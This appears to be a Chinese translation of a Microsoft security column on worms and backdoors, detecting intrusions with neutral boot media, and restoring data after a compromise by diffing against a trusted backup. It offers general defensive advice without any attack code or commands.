除了蠕虫和病毒外,还有许多其他问题在威胁着信息安全性(虽然蠕虫和病毒是有区别的,但是这方面的专家仍在就它们之间存在什么区别而争论不休;在本文中,我们主要讨论一般的恶意代码,因此在文中将蠕虫和病毒作为同一种攻击类型对待,并将它们统称为“蠕虫”)。既然我们将始终关注蠕虫问题,为什么不能将它们统称为蠕虫呢?Sasser/Blaster/Lion/Trino/Ramen/Slapper 和其他蠕虫都有极强的破坏性,消除这些蠕虫需要巨大的花费。虽然有几个蠕虫属于例外(例如 Linux Ramen 蠕虫和 Code Red),但一般来说蠕虫本身是没有破坏性的。这不是说蠕虫不可能有破坏性,而是说在您处理蠕虫时,您基本上知道会有什么结果。许多人都感染了相同的蠕虫,至少一部分人能够消除蠕虫,这就免除了您的麻烦。
但是,其中一些蠕虫会在系统中开设后门—这些后门使得真正的恶意攻击者能对系统进行比蠕虫本身的行为恶劣得多的破坏。Nimda 就是这样的蠕虫。另一种 Linux 蠕虫 Slapper 也是如此。蠕虫在您的系统中开设后门之后,恶意攻击者即可通过 Internet 控制您的系统。此外,所有这些蠕虫都不会创建任何种类的日志文件,因此您无法得知别人通过后门进行了哪些操作。系统被其中一种蠕虫感染之后,您就不能再信任该系统上的任何东西。事实上,一旦蠕虫成功地侵入了系统,您就应该将此视为不能再信任系统的征兆。另一种攻击很可能与蠕虫采用了相同的手段(攻击方式),并且可能已经对系统造成了比蠕虫本身更恶劣的影响。关键是,我们不应该把太多的注意力放在蠕虫上,而是应该更加关注蠕虫利用的漏洞。
电子邮件蠕虫问题与此略有不同;它们基本上是第 8 层问题—它们利用的是用户,而不是技术漏洞。这意味着我们必须用不同的方法来处理电子邮件蠕虫—用户只要不双击电子邮件附件,就不会有这些问题。反过来,如果管理措施能够让用户禁止接收任何电子邮件附件,至少对那些不愿意学会不双击可疑附件的用户来说,就也不会出现这类问题了。在比较新的 Microsoft Exchange 和 Outlook 版本上,做到这点非常容易。当然,这些用户中的任何人也可能会双击恶意的特洛依木马,那可是自讨苦吃的问题了。如果系统感染了电子邮件蠕虫,只凭这个事实还不能充分证明该系统已经被一位主动攻击者像网络蠕虫(例如 Sasser)侵入系统时那样破坏了系统的安全性。
到一天快过去的时候,比起蠕虫来,我更加担心主动攻击者—主动攻击者可使用许多不同的手段来进入您的系统和网络。蠕虫问题可以采取一些相对简单的步骤来解决(现列举如下,但不一定要实施):
�6�1 确保在所有的相关修补程序发布之后都立即进行部署。
�6�1 使用防火墙。
�6�1 使用防病毒程序。如果您没有防病毒程序,请到 免费下载一个。有关如何在更大的环境中部署防病毒解决方案的详细信息,请参阅新的 Microsoft Antivirus Defense-in-Depth Guide(Microsoft 防病毒纵深防御指南),地址是 。
�6�1 教育用户在检查邮件是否合法之前不要双击其中未经请求的附件;或者,禁止用户双击附件。
阻止蓄意的主动攻击者进入系统并不总是这么简单。此外,有些读者指出,我们并不总是有足够的备份来可靠地恢复系统。因此,检测系统是否已遭受危害就变得非常重要;如果答案是肯定的,则要判断系统受到了什么样的危害。这里有几种检测和判断方法。
返回页首
在没有备份的情况下抢救数据
使我夜不能寐的事情之一(除了小孩子的吵闹声或我乘坐的飞机的引擎噪音外)不是坏人有可能正站在我的门口,而是坏人已经登堂入室而我却不知道。我们都知道世界上坏人不少。在 Microsoft 最近举行的 Tech-Ed 会议上,一些犯罪组织“悬赏”50,000 美元奖励那些能够在会议期间摧毁网络的人。我们怎么知道这些人是不是位于系统内部?如果他们不够高明,他们会留下痕迹,比如新帐户、奇怪的文件和潜在的不稳定系统。目前,大多数攻击者都应该属于这一种;至少我希望他们是。但也有一些攻击者非常高明。他们在攻入系统之后会在操作系统中消失。他们会在根目录下安装一个组件,使得系统不再值得信任。Windows 资源管理器和命令行将不再显示系统中实际存在的文件。注册表编辑器也不反映真实情况。帐户管理器工具并不显示所有用户。在入侵的这个阶段,您不能再信任系统对其自身状况的报告了。此时,您需要采取恢复和重建方案(有些人把它叫做“推倒重建”)。系统现在已被完全损害。您能检测到攻击已经发生了吗?能检测到攻击者进行了哪些操作吗?
检测此类入侵有几个窍门。其中一个窍门是使用基于网络的入侵检测系统 (IDS),它能跟踪进出您的网络的通信量。基于网络的 IDS 是中立的,如果它未被损害,它可以让您了解进出可疑系统的通信。全面讨论 IDS 系统超出了本文的范围;对我们中的大多数人来说,IDS 系统也超出了我们的直接需要。在许多情况下,实际上保证网络安全要比花时间实施 IDS 更有价值。我们的大多数网络都可能需要进行大量额外的安全工作,如果我们事先没能做到这一点,则肯定会得到许多有趣的 IDS 日志。
您也可以通过分析系统本身来检测到系统已被入侵,但是这涉及到一些深入的法庭辩论。例如,因为您不能信任系统本身,所以必须用中立介质引导系统,最好是只读的介质。选择之一是引导到 Windows PE,它是一个只有命令行的 CD 启动版本的 Windows XP 或 Windows Server 2003。但是通常很难获得 Windows PE。另一个选择是获得一个 Winternals ERD Commander 或 System Restore 副本 ( )。这两个工具都基于 WinPE。ERD Commander 本质上是 WinPE 之上的一个 GUI,它为您提供了许多恢复崩溃系统的好工具。因为它是一个中立的安装,您可以信任该磁盘上的命令,由它告诉您可疑计算机上实际发生了什么情况。System Restore 是 ERD Commander 的扩展集,它也有对照基准检查系统的能力。例如,比如说您构建了一个 Web 服务器。一旦构建完成,您也就为系统状况创建了一个基准。将系统投入使用一段时间之后,您怀疑系统被黑了。例如,您可能检测到系统中发出了奇怪的网络通信量,于是决定对此展开分析。您可以让系统脱机,用恢复磁盘引导系统,然后比对最新的快照进行比较。这可以反映出已经发生的实际变化。但是,我们不能确定这些变化实际上是否代表入侵。您必须打电话请求技术帮助。
关于法庭辩论,最后要提醒的是:如果您真的相信已经受到入侵并想提起法律诉讼,您不应该自己独立进行辩论。请将系统断开,防止受损失范围扩大,然后邀请一位辩论专家。您有可能会毁灭证据并导致不被法庭采纳,这个风险会很大。如果您需要保留证据,请让专业人员来收集证据。
返回页首
在受到攻击之后恢复系统 – 有哪些有用的工具?
最后也是最重要的一个步骤:如果系统已经被黑了,怎样才能恢复服务并重新运行?这取决于系统的类型。首先,我不认为客户端备份有什么作用。网络中的客户端应该将它们的数据保存在服务器上;然后对服务器进行备份。如果客户端受到损害,可以重建客户端。服务器备份非常复杂。如果备份计划中包括客户端,则会使情况更为复杂,所以我们无须这样做。
但是很显然,在家庭环境或者非常小的网络中,这种观点是不适用的。在这样的环境中,我只使用少数几个内置的工具来生成最少数量的数据备份(不包括程序)。Windows XP 和 Windows 2000 自带了一个很好的备份工具。您可以用它将系统备份到任何媒介。在我看来,更简单的一个选择是使用“文件和设置转移向导”。每隔几个星期,我都会运行 Windows XP 中的“文件和设置转移向导”,为我的所有数据和配置文件创建备份副本。然后将这些备份烧制到 CD 上或者复制到另一个硬盘上。万一系统出现故障,只需几个小时即可重建系统,重新安装所有修补程序,然后用“文件和设置转移向导”恢复数据和配置文件。作为一种补充的安全措施,我还会用漫游配置文件来配置我家里的系统。该配置文件只漫游到同系统中的另一个硬盘,但是这种做法至少在发生硬盘故障的时候能够提供保护。但是,如果您感染的只是一般的病毒,用备份来恢复系统会有点小题大作。如果您只想清除病毒,请参见 Microsoft Antivirus Defense-in-Depth Guide(Microsoft 防病毒纵深防御指南)( ),了解具体操作步骤。
在规模更大的网络上,我们需要服务器备份。完整的备份计划和过程超出了本文的讨论范围。但是,许多读者在对上一篇文章的评论中提到,不论我们怎么计划备份,我们仍经常没有足够的备份,因此不得不设法从被损害的系统中恢复数据。这有几个窍门。首先,找出最后一次值得信任的备份,并将该备份中的数据恢复到一个隔离的替代系统中。然后将数据从被损害的系统中复制到隔离的替代系统中。接下来,使用 Windiff 这样的差别比对工具运行备份差别比对,比较它与被损害的系统在数据上有什么不同。记住,必须先用前面介绍过的方法用中立介质引导被损害的系统,然后才能进行这个比较;否则备份也有可能被损害。对于已经被变更的每一项,请查明数据所有者。接下来的任务就是让数据所有者证明这种差异是否正常。如果他们接受了这些差异,则将数据逆向集成到受信任的备份中。这是一个复杂而费时的过程,但只有这样才能保证新系统获得所需的数据,而不是简单地将受到损害的信息恢复到新系统。如果您只是从被损害的备份中恢复数据,那么最好的情况也只是获得不可信任的数据。在最坏的情况下,您只能创建另一个被损害的系统。
返回页首
结论
我在上面简要介绍的过程的确是一个痛苦的过程。这一点毫无疑问。我唯一能说的是“别激活即时信使程序。”这正是我们花费大量精力查明如何预防系统被黑的原因。让服务恢复正常的过程是痛苦的。相比较而言,从长期效果看,防止被黑的痛苦要少得多,而且这使您不得不恢复系统的可能性要小得多。在以后的专栏里,我们将重新更多地提供指导说明,帮助您尽量减少对恢复的依赖。
我们一如既往地为您撰写这个专栏。如果您想讨论某个内容,或者您认为有什么方式能让我们更好地帮助您保护系统安全,请告诉我们。您只需单击下面的“评论”链接,并给我们发来您的评论。
